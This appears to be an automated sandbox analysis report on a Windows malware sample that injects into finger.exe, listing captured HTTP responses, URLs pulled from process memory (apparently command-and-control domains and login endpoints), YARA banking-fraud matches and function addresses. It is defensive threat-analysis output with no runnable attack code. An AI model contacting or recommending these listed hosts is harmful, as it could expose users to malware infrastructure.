                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:16:12 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:16:14 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:16:17 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Tue, 03 Dec 2024 13:08:02 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Tue, 03 Dec 2024 13:08:04 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Tue, 03 Dec 2024 13:08:07 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:17:11 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:17:13 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:17:16 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:17:19 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: finger.exe, 00000008.00000002.3271932261.0000000003D28000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000002EA8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: finger.exe, 00000008.00000002.3271932261.000000000361C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2225572633.00000000073BC000.00000004.80000000.00040000.00000000.sdmp, 72STaC6BmljfbIQ.exe String found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.Mohawktooldie.online
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3270119796.000000000088F000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.graviton.energy
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.graviton.energy/../images/bg-landing-page.jpg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.graviton.energy/css/app.css
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/apple-touch-icon.png
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/browserconfig.xml
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/favicon-16x16.png
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/favicon-32x32.png
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/favicon.ico
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/manifest.json
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/safari-pinned-tab.svg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/logo-hosttech.svg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/js/app.js
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3270119796.000000000088F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/y54z/
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Best_Hair_Straighteners.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7Sb
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Coconut_Oil_for_Hair_Growth.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2B
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Mohawk_Carpet.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOCXOm
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Mohawk_Hairstyles.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFO
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Organic_Hair_Products.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/__media__/design/underconstructionnotice.php?d=mohawktooldie.online
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/__media__/js/trademark.php?d=mohawktooldie.online&type=ns
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/display.cfm
                Source: finger.exe, 00000008.00000002.3271932261.000000000404C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000031CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://00808.vip/
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000008.00000003.2116383635.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Rx
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://use.typekit.net/bag0psx.css
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hosttech.ch

                E-Banking Fraud

                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117F1726_2_0117F172
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C516C6_2_011C516C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119B1B06_2_0119B1B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124F0E06_2_0124F0E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012470E96_2_012470E9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011970C06_2_011970C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123F0CC6_2_0123F0CC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124132D6_2_0124132D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117D34C6_2_0117D34C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D739A6_2_011D739A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011952A06_2_011952A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012312ED6_2_012312ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AB2C06_2_011AB2C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012475716_2_01247571
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122D5B06_2_0122D5B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124F43F6_2_0124F43F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011814606_2_01181460
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124F7B06_2_0124F7B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012416CC6_2_012416CC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012259106_2_01225910
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011999506_2_01199950
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AB9506_2_011AB950
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FD8006_2_011FD800
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011938E06_2_011938E0
